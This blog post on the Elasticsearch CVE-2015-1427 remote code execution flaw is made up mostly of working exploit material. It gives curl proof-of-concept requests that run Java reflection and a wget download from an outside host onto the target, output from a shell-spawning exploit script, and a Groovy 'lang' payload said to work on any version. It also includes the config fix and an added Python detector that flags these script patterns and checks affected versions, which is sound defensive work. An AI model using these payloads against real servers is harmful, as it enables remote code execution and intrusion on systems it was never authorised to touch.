Wednesday, March 11, 2015
ElasticSearch CVE-2015-1427 RCE Exploit
References:
https://www.elastic.co/blog/elasticsearch-1-4-3-and-1-3-8-released/
https://jordan-wright.github.io/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/
http://www.theregister.co.uk/2015/03/10/elastic_search_vuln/?mt=1426090760048
Since the exploit is already out here [XiphosResearch github], here [in a comment :-) ] and here [Metasploit pull request]:
POCs:
curl http://localhost:9200/_search?pretty -XPOST -d '{"script_fields": {"myscript": {"script": "java.lang.Math.class.forName(\"java.lang.System\").getProperty(\"os.name\")"}}}'
curl http://localhost:9200/_search?pretty -XPOST -d '{"script_fields": {"myscript": {"script": "java.lang.Math.class.forName(\"java.lang.Runtime\") getRuntime() exec(\"wget -O /tmp/testy http://192.168.1.1:8080/es_test.txt\")"}}}'
$ cat /tmp/testy
It worked :-)
---
python elastic_shell.py 127.0.0.1
--snip--
Exploit for ElasticSearch , CVE-2015-1427 Version: 20150309.1
{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something
~$ ls
elasticsearch
elasticsearch-service-mgr.exe
elasticsearch-service-x64.exe
elasticsearch-service-x86.exe
elasticsearch.bat
elasticsearch.in.bat
elasticsearch.in.sh
plugin
plugin.bat
service.bat
~$
To fix, disable Groovy scripting in config/elasticsearch.yml and upgrade to 1.4.3+:
script.groovy.sandbox.enabled: false
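The post gives the attacker's request and the one-line config fix but nothing for the responder's side. Below is an added example (not code from this post, from Elastic, or from the exploit authors it links) that does the three checks a defender wants after reading it: flag logged request bodies that carry an inline script (the "script_fields" / "script" / "lang" shapes shown on this page, where the "lang" parameter is what the comment below uses to reach older MVEL-default versions), decide whether a reported version string sits in the range the fix releases 1.3.8 and 1.4.3 close, and check whether elasticsearch.yml actually contains the setting above. The suspicious-construct list and the sample request bodies are constructed for the example; the sample bodies reuse the request shapes visible on the page.

```python
"""Defender-side checks for CVE-2015-1427 (Elasticsearch Groovy scripting RCE).

Added example; not code from this post, from Elastic, or from the exploit
authors it links. Standard library only.
"""
import json
import re

# Constructs seen in the proof-of-concept bodies on this page. They score how
# suspicious an inline script is; the list is an assumption, not a full signature set.
SUSPICIOUS_PATTERNS = [
    r"\.class\.forName\(",
    r"java\.lang\.Runtime",
    r"getRuntime\(\)",
    r"\bexec\(",
    r"\.execute\(\)",
    r"java\.lang\.System",
]

# Constructed sample bodies, as a reverse proxy or packet capture in front of
# port 9200 might have logged them. The second and third reuse request shapes
# shown on this page.
SAMPLE_REQUESTS = {
    "benign_search": '{"query": {"match": {"title": "elasticsearch"}}}',
    "reflection_probe": (
        '{"script_fields": {"myscript": {"script": '
        '"java.lang.Math.class.forName(\\"java.lang.System\\")'
        '.getProperty(\\"os.name\\")"}}}'
    ),
    "groovy_lang": (
        '{"script_fields": {"result": {"script": "[\'ls\',\'/\'].execute().text",'
        ' "lang": "groovy"}}}'
    ),
}


def find_scripts(node, path=""):
    """Yield (json_path, script_text, lang) for every inline "script" string
    in a parsed request body, however deeply it is nested."""
    if isinstance(node, dict):
        script = node.get("script")
        if isinstance(script, str):
            yield path or "$", script, node.get("lang")
        for key, value in node.items():
            yield from find_scripts(value, f"{path}.{key}" if path else key)
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from find_scripts(value, f"{path}[{i}]")


def inspect_request_body(raw_body):
    """Return findings for one request body: where each inline script lives,
    which language it asked for and which suspicious patterns matched."""
    try:
        body = json.loads(raw_body)
    except json.JSONDecodeError:
        return []  # not JSON: nothing for the scripting engine to run
    findings = []
    for where, script, lang in find_scripts(body):
        hits = [p for p in SUSPICIOUS_PATTERNS if re.search(p, script)]
        findings.append({
            "path": where,
            "lang": lang or "default",
            "matched": hits,
            # any dynamic script deserves a look; reflection/exec is urgent
            "severity": "high" if hits else "medium",
        })
    return findings


def needs_upgrade(version):
    """True when a reported version is in the range this CVE affects: the
    Groovy-scripting releases before the 1.3.8 / 1.4.3 fixes announced in the
    post's first reference, i.e. 1.3.0-1.3.7 and 1.4.0-1.4.2. Earlier 1.x
    releases default to MVEL; that separate exposure is not judged here."""
    m = re.match(r"^(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    major, minor, patch = (int(x) for x in m.groups())
    if major != 1:
        return False
    if minor == 3:
        return patch < 8
    if minor == 4:
        return patch < 3
    return False


def groovy_sandbox_disabled(yaml_text):
    """Check elasticsearch.yml text for the setting the post recommends. Only
    flat "key: value" lines are understood (how it is normally written) and
    comments are ignored. Absent means the default, sandbox enabled."""
    for line in yaml_text.splitlines():
        line = line.split("#", 1)[0].strip()
        m = re.match(r"^script\.groovy\.sandbox\.enabled\s*:\s*(\S+)$", line)
        if m:
            return m.group(1).lower() == "false"
    return False


if __name__ == "__main__":
    for name, body in SAMPLE_REQUESTS.items():
        print(f"{name}: {inspect_request_body(body) or 'no inline scripts'}")
    print("1.4.2 needs upgrade:", needs_upgrade("1.4.2"))
    print("sandbox disabled:", groovy_sandbox_disabled("script.groovy.sandbox.enabled: false\n"))
```

Running it over the three constructed bodies reports nothing for the plain query, a high-severity finding at script_fields.myscript for the reflection probe, and a high-severity finding with lang "groovy" for the third body; any logged request that produces a finding at all is worth pulling the source address for, since legitimate clients rarely send inline scripts against port 9200.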
Thanks to Groovy scripting being enabled by default on recent versions, it's easier to execute:
...
"script_fields": {
    "result": {
        "script" : "['ls','/'].execute().text",
        "lang": "groovy"
    }
}
....
Specifying the "lang" parameter makes this exploit work on any version (old versions use MVEL by default).